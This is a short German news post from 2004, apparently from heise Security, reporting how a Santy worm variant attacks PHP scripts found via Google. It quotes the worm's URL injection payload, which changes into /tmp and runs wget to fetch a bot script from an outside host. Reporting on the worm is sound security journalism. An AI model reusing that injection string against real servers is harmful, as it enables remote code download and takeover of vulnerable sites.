Wurm attackiert PHP-Skripte
Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700
2004-12-26 00:00:00 2004-12-26 00:00:00 admin
Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:
http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;
Ãberprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.
hiese.de
Erfahrungen
Hier Kannst Du einen Kommentar verfassen
Verwandte Beiträge
Windows XP: Neue Version nicht für PCs vorgesehen
Heute hat Microsoft eine spezielle und neue Version von Windows XP angekündigt. Diese Version soll zum Beispiel zur Anwendung in Registrierkassen oder Set-Top Boxen der PayTV-Anbieter kommen. Diese neue Version, hauptsächlich auf der XP-Grundversion ...

Autor :
admin
Kategorie:
Software & Web-Development
Apache-Webserver 2.2.13 schließt Sicherheitslücke
Der Apache-Webserver Version 2.2.13 beseitigt Fehler und schließt eine Sicherheitslücke. ...

Autor :
admin
Kategorie:
Dies und Das
Microsoft veröffentlicht MSN Messenger 6.0
Microsoft hat die sechste Version seines MSN Messengers in einer endgültigen Fassung fertiggestellt. Nach dem Motto "Finde Dein digitales Ich" soll die Software den Nutzern erweiterte Möglichkeiten bieten, sich mit einer Online-Identität zu schmücken. Dem ...

Autor :
admin
Kategorie:
Software & Web-Development
PHP Version 5.0.1 veröffentlicht
Am 12. August gab das PHP Entwickler Team die Veröffentlichung der PHP Version 5.0.1 bekannt. Es handelt sich hier um ein Wartungsrelease welches nicht nur viele unkritische Fehler behebt sondern auch neue UNIX und Windows Installations Dokumente beinhalt ...

Autor :
admin
Kategorie:
Software & Web-Development
Oracles 10g XE Datenbank jetzt kostenlos downloaden
Oracle stellt seine Datenbank Oracle 10g XE (Express Edition) nun kostenlos zum Download bereit, bislang war nur eine Beta-Version zu haben. Der PHP Developer Guide kann online eingesehen werden. Das Datenbank-Management-System darf sowohl privat als auc ...

Autor :
admin
Kategorie:
Software & Web-Development
Microsoft Word Files mit PHPdocx erstellen
PHPdocx ist in der Version 2.3. PHPdocx ermöglicht das erstellen von MS-Word Docx aus PHP herraus. ...

Autor :
admin
Kategorie:
Dies und Das